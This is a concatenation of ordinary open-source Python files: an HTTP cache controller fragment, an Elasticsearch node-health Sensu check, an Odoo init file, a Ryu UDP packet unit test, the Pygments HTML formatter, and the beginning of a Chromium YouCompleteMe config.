if "no-store" in cc_req:
no_store = True
logger.debug('Request header has "no-store"')
if no_store and self.cache.get(cache_url):
logger.debug('Purging existing cache entry to honor "no-store"')
self.cache.delete(cache_url)
if no_store:
return
# https://tools.ietf.org/html/rfc7234#section-4.1:
# A Vary header field-value of "*" always fails to match.
# Storing such a response leads to a deserialization warning
# during cache lookup and is not allowed to ever be served,
# so storing it can be avoided.
if "*" in response_headers.get("vary", ""):
logger.debug('Response header has "Vary: *"')
return
# If we've been given an etag, then keep the response
if self.cache_etags and "etag" in response_headers:
logger.debug("Caching due to etag")
self.cache.set(
cache_url, self.serializer.dumps(request, response, body=body)
)
# Add to the cache any 301s. We do this before looking that
# the Date headers.
elif response.status == 301:
logger.debug("Caching permanant redirect")
self.cache.set(cache_url, self.serializer.dumps(request, response))
# Add to the cache if the response headers demand it. If there
# is no date header then we can't do anything about expiring
# the cache.
elif "date" in response_headers:
# cache when there is a max-age > 0
if "max-age" in cc and cc["max-age"] > 0:
logger.debug("Caching b/c date exists and max-age > 0")
self.cache.set(
cache_url, self.serializer.dumps(request, response, body=body)
)
# If the request can expire, it means we should cache it
# in the meantime.
elif "expires" in response_headers:
if response_headers["expires"]:
logger.debug("Caching b/c of expires header")
self.cache.set(
cache_url, self.serializer.dumps(request, response, body=body)
)
def update_cached_response(self, request, response):
"""On a 304 we will get a new set of headers that we want to
update our cached value with, assuming we have one.
This should only ever be called when we've sent an ETag and
gotten a 304 as the response.
"""
cache_url = self.cache_url(request.url)
cached_response = self.serializer.loads(request, self.cache.get(cache_url))
if not cached_response:
# we didn't have a cached response
return response
# Lets update our headers with the headers from the new request:
# http://tools.ietf.org/html/draft-ietf-httpbis-p4-conditional-26#section-4.1
#
# The server isn't supposed to send headers that would make
# the cached body invalid. But... just in case, we'll be sure
# to strip out ones we know that might be problmatic due to
# typical assumptions.
excluded_headers = ["content-length"]
cached_response.headers.update(
dict(
(k, v)
for k, v in response.headers.items()
if k.lower() not in excluded_headers
)
)
# we want a 200 b/c we have content via the cache
cached_response.status = 200
# update our cache
self.cache.set(cache_url, self.serializer.dumps(request, cached_response))
return cached_response
|
yieldbot/sensu-yieldbot-plugins | refs/heads/master | plugins/elasticsearch/check-es-tribe-node.py | 1 | #!/usr/bin/env python
"""Sensu check script: Check if tribe nodes are reachable and recent 7 days es doc count are more then threshold.
This script is run by Sensu at regular intervals.
"""
from optparse import OptionParser
import socket
import sys
import httplib
import json
import datetime
import re
CHECK_PASSING = 0
CHECK_WARNING = 1
CHECK_FAILING = 2
myname = socket.gethostname()
nodes = {}
nodes["coldevents"] = ["analytics-coldevents-0",
"analytics-coldevents-1",
"analytics-coldevents-2",
"analytics-coldevents-3",
"analytics-coldevents-4",
"analytics-coldevents-5",
"analytics-coldevents-6",
"analytics-coldevents-7",
"analytics-coldevents-8",
"analytics-coldevents-9",
"analytics-coldevents-10",
"analytics-coldevents-11",
"analytics-coldevents-12",
"analytics-coldevents-13",
"analytics-coldevents-14",
"analytics-coldevents-15",
"analytics-coldevents-16",
"analytics-coldevents-17",
"analytics-coldevents-18",
"analytics-coldevents-19",
"analytics-coldevents-20",
"analytics-tribe-0/coldevents",
"analytics-tribe-1/coldevents",
"analytics-tribe-2/coldevents"]
nodes["hotevents"] = ["analytics-hotevents-0",
"analytics-hotevents-1",
"analytics-hotevents-2",
"analytics-hotevents-3",
"analytics-hotevents-4",
"analytics-hotevents-5",
"analytics-hotevents-6",
"analytics-hotevents-7",
"analytics-hotevents-8",
"analytics-tribe-0/hotevents",
"analytics-tribe-1/hotevents",
"analytics-tribe-2/hotevents"]
nodes["aggregation"] = ["analytics-aggregation-0",
"analytics-aggregation-1",
"analytics-aggregation-2",
"analytics-aggregation-3",
"analytics-aggregation-4",
"analytics-aggregation-5",
"analytics-aggregation-6",
"analytics-aggregation-7",
"analytics-aggregation-8",
"analytics-aggregation-9",
"analytics-aggregation-10",
"analytics-aggregation-11",
"analytics-tribe-0/aggregation",
"analytics-tribe-1/aggregation",
"analytics-tribe-2/aggregation"]
def check_tribe_node(cluster):
conn = httplib.HTTPConnection(cluster)
now = datetime.datetime.utcnow()
output = []
for i in range(1,7):
dt = datetime.datetime(year=now.year, month=now.month, day=now.day) - datetime.timedelta(days=i)
dt_str = dt.strftime("%Y-%m-%d")
index = "adevents-" + dt_str
try:
conn.request("GET", "/%s/_count" % (index))
resp = conn.getresponse()
data = json.loads(resp.read())
if resp.status == 200:
if data['count'] < 1000000:
msg = "ES Doc Count for index= `%s` is `%d`, less then expected count." % (index, data['count'])
output.append(msg)
else:
msg = "Failed in getting ES Doc Count for index= `%s`. Reason: `%s`" % (index, data['error']['reason'])
output.append(msg)
except Exception, e:
print " `check_tribe_node:` host= `%s`, Unable to connect tribe node. got exception: `%s`" % (myname, e)
sys.exit(CHECK_FAILING)
conn.close()
if len(output) > 0:
print " `check_tribe_node:` Error on host= `%s` %s" % (myname, output)
sys.exit(CHECK_WARNING)
def check_nodes(cluster, name):
conn = httplib.HTTPConnection(cluster)
conn.request("GET", "/_cat/nodes?h=n")
resp = conn.getresponse()
data = resp.read()
output = ""
active = re.split("\s+",data)
for i in range(len(nodes[name])):
if nodes[name][i] not in active:
output = output + nodes[name][i] + ","
if output != "":
output = "`" + output + "` node/s for " + name + " cluster are down or not reachable.\n"
return output
if __name__ == '__main__':
cluster = "localhost:9200"
check_tribe_node(cluster)
try:
coldevents = check_nodes("analytics-coldevents.elasticsearch.service.us-east-1.consul:9200","coldevents")
hotevents = check_nodes("analytics-hotevents.elasticsearch.service.us-east-1.consul:9200","hotevents")
aggregation = check_nodes("analytics-aggregation.elasticsearch.service.us-east-1.consul:9200","aggregation")
except Exception, e:
print " `check_tribe_node:` host= `%s`, got exception: `%s`" % (myname, e)
sys.exit(CHECK_FAILING)
if coldevents == "" and hotevents == "" and aggregation == "":
print " `check_tribe_node:` The tribe node is fine and reachable."
sys.exit(CHECK_PASSING)
else:
print " `check_tribe_node:` %s %s %s" % (coldevents, hotevents, aggregation)
sys.exit(CHECK_WARNING)
|
ubiar/odoo | refs/heads/8.0 | addons/product/report/__init__.py | 452 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import product_pricelist
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
StephenKing/summerschool-2015-ryu | refs/heads/summerschool-step2-complete | ryu/tests/unit/packet/test_udp.py | 38 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import unittest
import logging
import struct
from struct import *
from nose.tools import *
from ryu.ofproto import ether, inet
from ryu.lib.packet.packet import Packet
from ryu.lib.packet.udp import udp
from ryu.lib.packet.ipv4 import ipv4
from ryu.lib.packet import packet_utils
from ryu.lib import addrconv
LOG = logging.getLogger('test_udp')
class Test_udp(unittest.TestCase):
""" Test case for udp
"""
src_port = 6431
dst_port = 8080
total_length = 65507
csum = 12345
u = udp(src_port, dst_port, total_length, csum)
buf = pack(udp._PACK_STR, src_port, dst_port, total_length, csum)
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
eq_(self.src_port, self.u.src_port)
eq_(self.dst_port, self.u.dst_port)
eq_(self.total_length, self.u.total_length)
eq_(self.csum, self.u.csum)
def test_parser(self):
r1, r2, _ = self.u.parser(self.buf)
eq_(self.src_port, r1.src_port)
eq_(self.dst_port, r1.dst_port)
eq_(self.total_length, r1.total_length)
eq_(self.csum, r1.csum)
eq_(None, r2)
def test_serialize(self):
src_port = 6431
dst_port = 8080
total_length = 0
csum = 0
src_ip = '192.168.10.1'
dst_ip = '192.168.100.1'
prev = ipv4(4, 5, 0, 0, 0, 0, 0, 64,
inet.IPPROTO_UDP, 0, src_ip, dst_ip)
u = udp(src_port, dst_port, total_length, csum)
buf = u.serialize(bytearray(), prev)
res = struct.unpack(udp._PACK_STR, buf)
eq_(res[0], src_port)
eq_(res[1], dst_port)
eq_(res[2], struct.calcsize(udp._PACK_STR))
# checksum
ph = struct.pack('!4s4sBBH',
addrconv.ipv4.text_to_bin(src_ip),
addrconv.ipv4.text_to_bin(dst_ip), 0, 17, res[2])
d = ph + buf + bytearray()
s = packet_utils.checksum(d)
eq_(0, s)
@raises(Exception)
def test_malformed_udp(self):
m_short_buf = self.buf[1:udp._MIN_LEN]
udp.parser(m_short_buf)
def test_default_args(self):
prev = ipv4(proto=inet.IPPROTO_UDP)
u = udp()
buf = u.serialize(bytearray(), prev)
res = struct.unpack(udp._PACK_STR, buf)
eq_(res[0], 1)
eq_(res[1], 1)
eq_(res[2], udp._MIN_LEN)
def test_json(self):
jsondict = self.u.to_jsondict()
u = udp.from_jsondict(jsondict['udp'])
eq_(str(self.u), str(u))
|
artdent/jgments | refs/heads/master | lib/pygments-1.2.2-patched/pygments/formatters/html.py | 3 | # -*- coding: utf-8 -*-
"""
pygments.formatters.html
~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for HTML output.
:copyright: Copyright 2006-2010 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys, os
import StringIO
try:
set
except NameError:
from sets import Set as set
from pygments.formatter import Formatter
from pygments.token import Token, Text, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, get_list_opt, bytes
__all__ = ['HtmlFormatter']
def escape_html(text):
"""Escape &, <, > as well as single and double quotes for HTML."""
return text.replace('&', '&'). \
replace('<', '<'). \
replace('>', '>'). \
replace('"', '"'). \
replace("'", ''')
def get_random_id():
"""Return a random id for javascript fields."""
from random import random
from time import time
try:
from hashlib import sha1 as sha
except ImportError:
import sha
sha = sha.new
return sha('%s|%s' % (random(), time())).hexdigest()
def _get_ttype_class(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = '-' + ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
CSSFILE_TEMPLATE = '''\
td.linenos { background-color: #f0f0f0; padding-right: 10px; }
span.lineno { background-color: #f0f0f0; padding: 0 5px 0 5px; }
pre { line-height: 125%%; }
%(styledefs)s
'''
DOC_HEADER = '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=%(encoding)s">
<style type="text/css">
''' + CSSFILE_TEMPLATE + '''
</style>
</head>
<body>
<h2>%(title)s</h2>
'''
DOC_HEADER_EXTERNALCSS = '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=%(encoding)s">
<link rel="stylesheet" href="%(cssfile)s" type="text/css">
</head>
<body>
<h2>%(title)s</h2>
'''
DOC_FOOTER = '''\
</body>
</html>
'''
class HtmlFormatter(Formatter):
r"""
Format tokens as HTML 4 ``<span>`` tags within a ``<pre>`` tag, wrapped
in a ``<div>`` tag. The ``<div>``'s CSS class can be set by the `cssclass`
option.
If the `linenos` option is set to ``"table"``, the ``<pre>`` is
additionally wrapped inside a ``<table>`` which has one row and two
cells: one containing the line numbers and one containing the code.
Example:
.. sourcecode:: html
<div class="highlight" >
<table><tr>
<td class="linenos" title="click to toggle"
onclick="with (this.firstChild.style)
{ display = (display == '') ? 'none' : '' }">
<pre>1
2</pre>
</td>
<td class="code">
<pre><span class="Ke">def </span><span class="NaFu">foo</span>(bar):
<span class="Ke">pass</span>
</pre>
</td>
</tr></table></div>
(whitespace added to improve clarity).
Wrapping can be disabled using the `nowrap` option.
A list of lines can be specified using the `hl_lines` option to make these
lines highlighted (as of Pygments 0.11).
With the `full` option, a complete HTML 4 document is output, including
the style definitions inside a ``<style>`` tag, or in a separate file if
the `cssfile` option is given.
The `get_style_defs(arg='')` method of a `HtmlFormatter` returns a string
containing CSS rules for the CSS classes used by the formatter. The
argument `arg` can be used to specify additional CSS selectors that
are prepended to the classes. A call `fmter.get_style_defs('td .code')`
would result in the following CSS classes:
.. sourcecode:: css
td .code .kw { font-weight: bold; color: #00FF00 }
td .code .cm { color: #999999 }
...
If you have Pygments 0.6 or higher, you can also pass a list or tuple to the
`get_style_defs()` method to request multiple prefixes for the tokens:
.. sourcecode:: python
formatter.get_style_defs(['div.syntax pre', 'pre.syntax'])
The output would then look like this:
.. sourcecode:: css
div.syntax pre .kw,
pre.syntax .kw { font-weight: bold; color: #00FF00 }
div.syntax pre .cm,
pre.syntax .cm { color: #999999 }
...
Additional options accepted:
`nowrap`
If set to ``True``, don't wrap the tokens at all, not even inside a ``<pre>``
tag. This disables most other options (default: ``False``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``). This option has no effect if the `cssfile`
and `noclobber_cssfile` option are given and the file specified in
`cssfile` exists.
`noclasses`
If set to true, token ``<span>`` tags will not use CSS classes, but
inline styles. This is not recommended for larger pieces of code since
it increases output size by quite a bit (default: ``False``).
`classprefix`
Since the token types use relatively short class names, they may clash
with some of your own class names. In this case you can use the
`classprefix` option to give a string to prepend to all Pygments-generated
CSS class names for token types.
Note that this option also affects the output of `get_style_defs()`.
`cssclass`
CSS class for the wrapping ``<div>`` tag (default: ``'highlight'``).
If you set this option, the default selector for `get_style_defs()`
will be this class.
*New in Pygments 0.9:* If you select the ``'table'`` line numbers, the
wrapping table will have a CSS class of this string plus ``'table'``,
the default is accordingly ``'highlighttable'``.
`cssstyles`
Inline CSS styles for the wrapping ``<div>`` tag (default: ``''``).
`prestyles`
Inline CSS styles for the ``<pre>`` tag (default: ``''``). *New in
Pygments 0.11.*
`cssfile`
If the `full` option is true and this option is given, it must be the
name of an external file. If the filename does not include an absolute
path, the file's path will be assumed to be relative to the main output
file's path, if the latter can be found. The stylesheet is then written
to this file instead of the HTML file. *New in Pygments 0.6.*
`noclobber_cssfile`
If `cssfile` is given and the specified file exists, the css file will
not be overwritten. This allows the use of the `full` option in
combination with a user specified css file. Default is ``False``.
*New in Pygments 1.1.*
`linenos`
If set to ``'table'``, output line numbers as a table with two cells,
one containing the line numbers, the other the whole code. This is
copy-and-paste-friendly, but may cause alignment problems with some
browsers or fonts. If set to ``'inline'``, the line numbers will be
integrated in the ``<pre>`` tag that contains the code (that setting
is *new in Pygments 0.8*).
For compatibility with Pygments 0.7 and earlier, every true value
except ``'inline'`` means the same as ``'table'`` (in particular, that
means also ``True``).
The default value is ``False``, which means no line numbers at all.
**Note:** with the default ("table") line number mechanism, the line
numbers and code can have different line heights in Internet Explorer
unless you give the enclosing ``<pre>`` tags an explicit ``line-height``
CSS property (you get the default line spacing with ``line-height:
125%``).
`hl_lines`
Specify a list of lines to be highlighted. *New in Pygments 0.11.*
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`linenospecial`
If set to a number n > 0, every nth line number is given the CSS
class ``"special"`` (default: ``0``).
`nobackground`
If set to ``True``, the formatter won't output the background color
for the wrapping element (this automatically defaults to ``False``
when there is no wrapping element [eg: no argument for the
`get_syntax_defs` method given]) (default: ``False``). *New in
Pygments 0.6.*
`lineseparator`
This string is output between lines of code. It defaults to ``"\n"``,
which is enough to break a line inside ``<pre>`` tags, but you can
e.g. set it to ``"<br>"`` to get HTML line breaks. *New in Pygments
0.7.*
`lineanchors`
If set to a nonempty string, e.g. ``foo``, the formatter will wrap each
output line in an anchor tag with a ``name`` of ``foo-linenumber``.
This allows easy linking to certain lines. *New in Pygments 0.9.*
`anchorlinenos`
If set to `True`, will wrap line numbers in <a> tags. Used in
combination with `linenos` and `lineanchors`.
**Subclassing the HTML formatter**
*New in Pygments 0.7.*
The HTML formatter is now built in a way that allows easy subclassing, thus
customizing the output HTML code. The `format()` method calls
`self._format_lines()` which returns a generator that yields tuples of ``(1,
line)``, where the ``1`` indicates that the ``line`` is a line of the
formatted source code.
If the `nowrap` option is set, the generator is the iterated over and the
resulting HTML is output.
Otherwise, `format()` calls `self.wrap()`, which wraps the generator with
other generators. These may add some HTML code to the one generated by
`_format_lines()`, either by modifying the lines generated by the latter,
then yielding them again with ``(1, line)``, and/or by yielding other HTML
code before or after the lines, with ``(0, html)``. The distinction between
source lines and other code makes it possible to wrap the generator multiple
times.
The default `wrap()` implementation adds a ``<div>`` and a ``<pre>`` tag.
A custom `HtmlFormatter` subclass could look like this:
.. sourcecode:: python
class CodeHtmlFormatter(HtmlFormatter):
def wrap(self, source, outfile):
return self._wrap_code(source)
def _wrap_code(self, source):
yield 0, '<code>'
for i, t in source:
if i == 1:
# it's a line of formatted code
t += '<br>'
yield i, t
yield 0, '</code>'
This results in wrapping the formatted lines with a ``<code>`` tag, where the
source lines are broken using ``<br>`` tags.
After calling `wrap()`, the `format()` method also adds the "line numbers"
and/or "full document" wrappers if the respective options are set. Then, all
HTML yielded by the wrapped generator is output.
"""
name = 'HTML'
aliases = ['html']
filenames = ['*.html', '*.htm']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.title = self._decodeifneeded(self.title)
self.nowrap = get_bool_opt(options, 'nowrap', False)
self.noclasses = get_bool_opt(options, 'noclasses', False)
self.classprefix = options.get('classprefix', '')
self.cssclass = self._decodeifneeded(options.get('cssclass', 'highlight'))
self.cssstyles = self._decodeifneeded(options.get('cssstyles', ''))
self.prestyles = self._decodeifneeded(options.get('prestyles', ''))
self.cssfile = self._decodeifneeded(options.get('cssfile', ''))
self.noclobber_cssfile = get_bool_opt(options, 'noclobber_cssfile', False)
linenos = options.get('linenos', False)
if linenos == 'inline':
self.linenos = 2
elif linenos:
# compatibility with <= 0.7
self.linenos = 1
else:
self.linenos = 0
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.linenospecial = abs(get_int_opt(options, 'linenospecial', 0))
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.lineseparator = options.get('lineseparator', '\n')
self.lineanchors = options.get('lineanchors', '')
self.anchorlinenos = options.get('anchorlinenos', False)
self.hl_lines = set()
for lineno in get_list_opt(options, 'hl_lines', []):
try:
self.hl_lines.add(int(lineno))
except ValueError:
pass
self._class_cache = {}
self._create_stylesheet()
def _get_css_class(self, ttype):
"""Return the css class of this token type prefixed with
the classprefix option."""
if ttype in self._class_cache:
return self._class_cache[ttype]
return self.classprefix + _get_ttype_class(ttype)
def _create_stylesheet(self):
t2c = self.ttype2class = {Token: ''}
c2s = self.class2style = {}
cp = self.classprefix
for ttype, ndef in self.style:
name = cp + _get_ttype_class(ttype)
style = ''
if ndef['color']:
style += 'color: #%s; ' % ndef['color']
if ndef['bold']:
style += 'font-weight: bold; '
if ndef['italic']:
style += 'font-style: italic; '
if ndef['underline']:
style += 'text-decoration: underline; '
if ndef['bgcolor']:
style += 'background-color: #%s; ' % ndef['bgcolor']
if ndef['border']:
style += 'border: 1px solid #%s; ' % ndef['border']
if style:
t2c[ttype] = name
# save len(ttype) to enable ordering the styles by
# hierarchy (necessary for CSS cascading rules!)
c2s[name] = (style[:-2], ttype, len(ttype))
def get_style_defs(self, arg=None):
"""
Return CSS style definitions for the classes produced by the current
highlighting style. ``arg`` can be a string or list of selectors to
insert before the token type classes.
"""
if arg is None:
arg = ('cssclass' in self.options and '.'+self.cssclass or '')
if isinstance(arg, basestring):
args = [arg]
else:
args = list(arg)
def prefix(cls):
if cls:
cls = '.' + cls
tmp = []
for arg in args:
tmp.append((arg and arg + ' ' or '') + cls)
return ', '.join(tmp)
styles = [(level, ttype, cls, style)
for cls, (style, ttype, level) in self.class2style.iteritems()
if cls and style]
styles.sort()
lines = ['%s { %s } /* %s */' % (prefix(cls), style, repr(ttype)[6:])
for (level, ttype, cls, style) in styles]
if arg and not self.nobackground and \
self.style.background_color is not None:
text_style = ''
if Text in self.ttype2class:
text_style = ' ' + self.class2style[self.ttype2class[Text]][0]
lines.insert(0, '%s { background: %s;%s }' %
(prefix(''), self.style.background_color, text_style))
if self.style.highlight_color is not None:
lines.insert(0, '%s.hll { background-color: %s }' %
(prefix(''), self.style.highlight_color))
return '\n'.join(lines)
def _decodeifneeded(self, value):
if isinstance(value, bytes):
if self.encoding:
return value.decode(self.encoding)
return value.decode()
return value
def _wrap_full(self, inner, outfile):
if self.cssfile:
if os.path.isabs(self.cssfile):
# it's an absolute filename
cssfilename = self.cssfile
else:
try:
filename = outfile.name
if not filename or filename[0] == '<':
# pseudo files, e.g. name == '<fdopen>'
raise AttributeError
cssfilename = os.path.join(os.path.dirname(filename),
self.cssfile)
except AttributeError:
print >>sys.stderr, 'Note: Cannot determine output file name, ' \
'using current directory as base for the CSS file name'
cssfilename = self.cssfile
# write CSS file only if noclobber_cssfile isn't given as an option.
try:
if not os.path.exists(cssfilename) or not self.noclobber_cssfile:
cf = open(cssfilename, "w")
cf.write(CSSFILE_TEMPLATE %
{'styledefs': self.get_style_defs('body')})
cf.close()
except IOError, err:
err.strerror = 'Error writing CSS file: ' + err.strerror
raise
yield 0, (DOC_HEADER_EXTERNALCSS %
dict(title = self.title,
cssfile = self.cssfile,
encoding = self.encoding))
else:
yield 0, (DOC_HEADER %
dict(title = self.title,
styledefs = self.get_style_defs('body'),
encoding = self.encoding))
for t, line in inner:
yield t, line
yield 0, DOC_FOOTER
def _wrap_tablelinenos(self, inner):
dummyoutfile = StringIO.StringIO()
lncount = 0
for t, line in inner:
if t:
lncount += 1
dummyoutfile.write(line)
fl = self.linenostart
mw = len(str(lncount + fl - 1))
sp = self.linenospecial
st = self.linenostep
la = self.lineanchors
aln = self.anchorlinenos
if sp:
lines = []
for i in range(fl, fl+lncount):
if i % st == 0:
if i % sp == 0:
if aln:
lines.append('<a href="#%s-%d" class="special">%*d</a>' %
(la, i, mw, i))
else:
lines.append('<span class="special">%*d</span>' % (mw, i))
else:
if aln:
lines.append('<a href="#%s-%d">%*d</a>' % (la, i, mw, i))
else:
lines.append('%*d' % (mw, i))
else:
lines.append('')
ls = '\n'.join(lines)
else:
lines = []
for i in range(fl, fl+lncount):
if i % st == 0:
if aln:
lines.append('<a href="#%s-%d">%*d</a>' % (la, i, mw, i))
else:
lines.append('%*d' % (mw, i))
else:
lines.append('')
ls = '\n'.join(lines)
# in case you wonder about the seemingly redundant <div> here: since the
# content in the other cell also is wrapped in a div, some browsers in
# some configurations seem to mess up the formatting...
yield 0, ('<table class="%stable">' % self.cssclass +
'<tr><td class="linenos"><div class="linenodiv"><pre>' +
ls + '</pre></div></td><td class="code">')
yield 0, dummyoutfile.getvalue()
yield 0, '</td></tr></table>'
def _wrap_inlinelinenos(self, inner):
# need a list of lines since we need the width of a single number :(
lines = list(inner)
sp = self.linenospecial
st = self.linenostep
num = self.linenostart
mw = len(str(len(lines) + num - 1))
if sp:
for t, line in lines:
yield 1, '<span class="lineno%s">%*s</span> ' % (
num%sp == 0 and ' special' or '', mw,
(num%st and ' ' or num)) + line
num += 1
else:
for t, line in lines:
yield 1, '<span class="lineno">%*s</span> ' % (
mw, (num%st and ' ' or num)) + line
num += 1
def _wrap_lineanchors(self, inner):
s = self.lineanchors
i = 0
for t, line in inner:
if t:
i += 1
yield 1, '<a name="%s-%d"></a>' % (s, i) + line
else:
yield 0, line
def _wrap_div(self, inner):
style = []
if (self.noclasses and not self.nobackground and
self.style.background_color is not None):
style.append('background: %s' % (self.style.background_color,))
if self.cssstyles:
style.append(self.cssstyles)
style = '; '.join(style)
yield 0, ('<div' + (self.cssclass and ' class="%s"' % self.cssclass)
+ (style and (' style="%s"' % style)) + '>')
for tup in inner:
yield tup
yield 0, '</div>\n'
def _wrap_pre(self, inner):
style = []
if self.prestyles:
style.append(self.prestyles)
if self.noclasses:
style.append('line-height: 125%')
style = '; '.join(style)
yield 0, ('<pre' + (style and ' style="%s"' % style) + '>')
for tup in inner:
yield tup
yield 0, '</pre>'
def _format_lines(self, tokensource):
"""
Just format the tokens, without any wrapping tags.
Yield individual lines.
"""
nocls = self.noclasses
lsep = self.lineseparator
# for <span style=""> lookup only
getcls = self.ttype2class.get
c2s = self.class2style
lspan = ''
line = ''
for ttype, value in tokensource:
if nocls:
cclass = getcls(ttype)
while cclass is None:
ttype = ttype.parent
cclass = getcls(ttype)
cspan = cclass and '<span style="%s">' % c2s[cclass][0] or ''
else:
cls = self._get_css_class(ttype)
cspan = cls and '<span class="%s">' % cls or ''
parts = escape_html(value).split('\n')
# for all but the last line
for part in parts[:-1]:
if line:
if lspan != cspan:
line += (lspan and '</span>') + cspan + part + \
(cspan and '</span>') + lsep
else: # both are the same
line += part + (lspan and '</span>') + lsep
yield 1, line
line = ''
elif part:
yield 1, cspan + part + (cspan and '</span>') + lsep
else:
yield 1, lsep
# for the last line
if line and parts[-1]:
if lspan != cspan:
line += (lspan and '</span>') + cspan + parts[-1]
lspan = cspan
else:
line += parts[-1]
elif parts[-1]:
line = cspan + parts[-1]
lspan = cspan
# else we neither have to open a new span nor set lspan
if line:
yield 1, line + (lspan and '</span>') + lsep
def _highlight_lines(self, tokensource):
"""
Highlighted the lines specified in the `hl_lines` option by
post-processing the token stream coming from `_format_lines`.
"""
hls = self.hl_lines
for i, (t, value) in enumerate(tokensource):
if t != 1:
yield t, value
if i + 1 in hls: # i + 1 because Python indexes start at 0
if self.noclasses:
style = ''
if self.style.highlight_color is not None:
style = (' style="background-color: %s"' %
(self.style.highlight_color,))
yield 1, '<span%s>%s</span>' % (style, value)
else:
yield 1, '<span class="hll">%s</span>' % value
else:
yield 1, value
def wrap(self, source, outfile):
"""
Wrap the ``source``, which is a generator yielding
individual lines, in custom generators. See docstring
for `format`. Can be overridden.
"""
return self._wrap_div(self._wrap_pre(source))
def format_unencoded(self, tokensource, outfile):
"""
The formatting process uses several nested generators; which of
them are used is determined by the user's options.
Each generator should take at least one argument, ``inner``,
and wrap the pieces of text generated by this.
Always yield 2-tuples: (code, text). If "code" is 1, the text
is part of the original tokensource being highlighted, if it's
0, the text is some piece of wrapping. This makes it possible to
use several different wrappers that process the original source
linewise, e.g. line number generators.
"""
source = self._format_lines(tokensource)
if self.hl_lines:
source = self._highlight_lines(source)
if not self.nowrap:
if self.linenos == 2:
source = self._wrap_inlinelinenos(source)
if self.lineanchors:
source = self._wrap_lineanchors(source)
source = self.wrap(source, outfile)
if self.linenos == 1:
source = self._wrap_tablelinenos(source)
if self.full:
source = self._wrap_full(source, outfile)
for t, piece in source:
outfile.write(piece)
|
Bysmyyr/chromium-crosswalk | refs/heads/master | tools/vim/chromium.ycm_extra_conf.py | 15 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Autocompletion config for YouCompleteMe in Chromium.
#
# USAGE:
#
# 1. Install YCM [https://github.com/Valloric/YouCompleteMe]
# (Googlers should check out [go/ycm])
#
# 2. Create a symbolic link to this file called .ycm_extra_conf.py in the
# directory above your Chromium checkout (i.e. next to your .gclient file).
#
# cd src
# ln -rs tools/vim/chromium.ycm_extra_conf.py ../.ycm_extra_conf.py
#
# 3. (optional) Whitelist the .ycm_extra_conf.py from step #2 by adding the
# following to your .vimrc:
#
# let g:ycm_extra_conf_globlist=['<path to .ycm_extra_conf.py>']
#
# You can also add other .ycm_extra_conf.py files you want to use to this
# list to prevent excessive prompting each time you visit a directory
# covered by a config file.
#
# 4. Profit
#
#
# Usage notes:
#
# * You must use ninja & clang to build Chromium.
#
# * You must have run gyp_chromium and built Chromium recently.
#
#
# Hacking notes:
#
# * The purpose of this script is to construct an accurate enough command line
# for YCM to pass to clang so it can build and extract the symbols.
#
# * Right now, we only pull the -I and -D flags. That seems to be sufficient
# for everything I've used it for.
#
# * That whole ninja & clang thing? We could support other configs if someone
# were willing to write the correct commands and a parser.
#
# * This has only been tested on gPrecise.
import os
import os.path
import re
import shlex
import subprocess
import sys
# Flags from YCM's default config.
_default_flags = [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x',
'c++',
]
def PathExists(*args):
return os.path.exists(os.path.join(*args))
def FindChromeSrcFromFilename(filename):
"""Searches for the root of the Chromium checkout.
Simply checks parent directories until it finds .gclient and src/.
Args:
filename: (String) Path to source file being edited.
Returns:
(String) Path of 'src/', or None if unable to find.
"""
curdir = os.path.normpath(os.path.dirname(filename))
while not (os.path.basename(os.path.realpath(curdir)) == 'src'
and PathExists(curdir, 'DEPS')
and (PathExists(curdir, '..', '.gclient')
or PathExists(curdir, '.git'))):
nextdir = os.path.normpath(os.path.join(curdir, '..'))
if nextdir == curdir:
return None
curdir = nextdir
return curdir
def GetDefaultSourceFile(chrome_root, filename):
"""Returns the default source file to use as an alternative to |filename|.
